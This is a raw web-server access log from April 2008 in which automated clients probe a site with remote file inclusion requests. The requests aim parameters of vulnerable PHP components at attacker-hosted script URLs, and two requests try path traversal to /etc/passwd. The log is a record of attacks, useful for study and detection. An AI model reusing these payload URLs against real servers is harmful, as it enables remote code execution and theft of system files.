219.232.41.148 - - [10/Apr/2008:12:38:04 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:38:28 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:38:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:38:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.246.64.173 - - [10/Apr/2008:12:39:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [10/Apr/2008:12:39:44 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://belajarinvestasi.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [10/Apr/2008:12:39:45 -0700] "GET /logs/modifyform.html?code=http://belajarinvestasi.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:12:39:52 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:40:15 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:40:15 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:40:15 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [10/Apr/2008:12:40:20 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://belajarinvestasi.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [10/Apr/2008:12:40:22 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:40:42 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:40:43 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:40:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:12:41:15 -0700] "GET /logs/access_080108.log/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:12:41:18 -0700] "GET /index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.87 - - [10/Apr/2008:12:41:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.20.236 - - [10/Apr/2008:12:41:20 -0700] "GET /blog/ HTTP/1.0" 200 7356 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
84.243.253.159 - - [10/Apr/2008:12:41:24 -0700] "GET /logs/access_080120.log/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:12:41:24 -0700] "GET /logs/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:12:41:25 -0700] "GET /logs/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:41:30 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:41:42 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:41:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:41:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.25.52 - - [10/Apr/2008:12:41:58 -0700] "GET /blog/index.php/2008/04/03/ HTTP/1.0" 200 6453 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:42:23 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:42:23 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:42:23 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.191.6.26 - - [10/Apr/2008:12:42:24 -0700] "GET /logs/access_080225.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:42:29 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:42:46 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:42:46 -0700] "GET /modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:42:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:43:11 -0700] "GET /logs/access_080308.log/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:43:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:43:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:43:45 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:43:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:43:46 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:43:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:43:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:44:08 -0700] "GET /logs/access_080312.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.27.8.25 - - [10/Apr/2008:12:44:19 -0700] "GET /logs/access_080309.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.64.173 - - [10/Apr/2008:12:44:31 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.246.64.173 - - [10/Apr/2008:12:44:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:45:23 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:45:32 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.3.209 - - [10/Apr/2008:12:45:45 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://chrystylcoiffure.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.64.173 - - [10/Apr/2008:12:46:08 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [10/Apr/2008:12:47:05 -0700] "GET /logs/access_080126.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [10/Apr/2008:12:47:05 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [10/Apr/2008:12:47:11 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:12:47:14 -0700] "GET //lang.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [10/Apr/2008:12:47:16 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:12:48:02 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:12:48:03 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.121.10.188 - - [10/Apr/2008:12:48:25 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.10.188 - - [10/Apr/2008:12:48:25 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.100.55 - - [10/Apr/2008:12:48:45 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.100.55 - - [10/Apr/2008:12:48:46 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:48:46 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:48:46 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:48:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.192.70.11 - - [10/Apr/2008:12:49:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
82.192.70.11 - - [10/Apr/2008:12:49:16 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:49:29 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:49:30 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:12:50:06 -0700] "GET /logs/access_080112.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:12:50:06 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:12:50:09 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:12:50:14 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:12:50:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:12:50:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:50:40 -0700] "GET /index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:12:50:42 -0700] "GET /index.php?fn=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:12:50:51 -0700] "GET /logs/access_080219.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:12:51:11 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:12:51:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:12:51:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:51:29 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:51:30 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:12:51:30 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:12:51:57 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.46 - - [10/Apr/2008:12:53:54 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.chiefsfaulerknecht.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:54:14 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:12:54:28 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://theleybournes.com/images/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:12:54:43 -0700] "GET /logs/access_080120.log/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:12:54:44 -0700] "GET /logs/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.13.122.223 - - [10/Apr/2008:12:55:12 -0700] "GET /logs/access_080225.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [10/Apr/2008:12:55:20 -0700] "GET /logs/access_080321.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:55:40 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:55:40 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:12:55:41 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:55:58 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:55:59 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:12:55:59 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:12:56:32 -0700] "GET /logs/access_080120.log/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:12:56:32 -0700] "GET /logs/index.php?fn=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.100.55 - - [10/Apr/2008:12:56:33 -0700] "GET /logs/access_080329.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:56:51 -0700] "GET /logs/access_080130.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:56:51 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:12:56:51 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:12:57:05 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:12:57:06 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:12:57:31 -0700] "GET /logs/access_080329.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
